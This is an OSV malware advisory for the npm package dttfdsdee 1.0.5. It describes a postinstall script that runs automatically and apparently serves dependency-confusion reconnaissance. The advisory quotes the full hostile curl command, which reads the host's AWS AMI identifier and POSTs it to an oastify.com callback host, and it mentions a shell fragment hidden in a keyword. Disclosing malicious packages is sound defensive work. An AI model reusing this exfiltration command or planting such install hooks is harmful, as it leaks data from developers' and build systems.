dttfdsdee @1.0.5
Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 2:48 PM UTC
OSV ID
MAL-2026-6498
Ecosystem
npm
Summary
package.json declares a postinstall lifecycle script that runs on every npm install: curl -X POST -d "$(cat /data/ami-id)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data. This reads the AWS EC2 AMI identifier from the installing host and POSTs it over plain HTTP to an attacker-controlled oastify.com subdomain (a Burp Collaborator out-of-band callback host). The script auto-executes without user consent and is unrelated to any documented package purpose; the internal name claims to be easy-string-kit, while the author, repository, and homepage metadata fields are empty and a keyword contains an embedded shell fragment (trunls -lae). The shape — throwaway name, missing maintainer metadata, OAST exfiltration of a host identifier on install — is consistent with reconnaissance / dependency-confusion probing of internal build environments.
Source: amazon-inspector (7f61e9b10455dc3781fcee5dfb2654ff824c2ac2e51dfaf7ebfba342f570f66c)